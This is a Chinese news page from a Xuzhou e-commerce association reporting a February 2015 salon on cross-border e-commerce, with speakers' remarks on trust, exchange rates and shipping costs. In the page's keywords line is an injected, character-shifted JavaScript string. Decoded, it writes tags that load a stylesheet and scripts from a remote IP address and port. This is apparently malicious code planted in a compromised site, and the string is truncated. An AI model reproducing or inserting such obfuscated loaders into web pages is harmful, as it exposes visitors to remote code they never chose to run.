您当前位置:首页 > 新闻 > 协会新闻 > 协会举办150203期徐州电商沙龙【图】

协会举办150203期徐州电商沙龙【图】

2015-02-11 22:52点击数() 加入收藏



   2月3日晚8点,电商沙龙活动在科技广场蜂巢青创咖啡馆内准时开始。徐工集团进出口有限公司电子商务部部长刘斌和东方黎明国际贸易有限公司副总经理宫宜强受邀,与现场40多名来客分享了跨境电商的经验,介绍了跨境电商的商务模式,总结了跨境电商的感受。以下为沙龙现场嘉宾的发言整理:




徐工集团进出口有限公司电子商务部部长刘斌


刘  斌:千百前来,贸易往来并没有大的差别,都是基于信任。
              在国际贸易中规则太多,要想做跨境电商需要研究透各种规则。







东方黎明国际贸易有限公司副总经理宫宜强


            宫宜强:做跨境电商要考虑综合方面,尤其是汇率和国际运输,这些需要占用不菲的成本。
            做好这一行业要对目标市场客户群去研究,要通过业务渠道去搜集,要谋定而后动。
            要想做中国好的跨境电商,诚信是基础。
            国际上很多电商企业,只有亚马逊没有自己的传统生产渠道。
            产品永远是各种销售渠道中排在首位的。
            跨境电商是一种地球村生意,需要对当地的居民多了解。


以下为徐州集团进出口公司跨境电子商务课件展示,感谢刘斌部长为分享。


















关键词: <script>var d="=iunm?=ifbe?=mjol!sfm>#tuzmftiffu#!uzqf>#ufyu0dtt#!isfg>#iuuq;00322/249/318/33:;6873903/dtt#?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00322/249/318/33:;687390d/kt#?=0tdsjqu?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>

上一篇:徐州电商“征下联、赢千元大奖”活动评选揭晓
下一篇:协会举办150210期徐州电商沙龙

扫描关注二维码

关注微博

GO TOP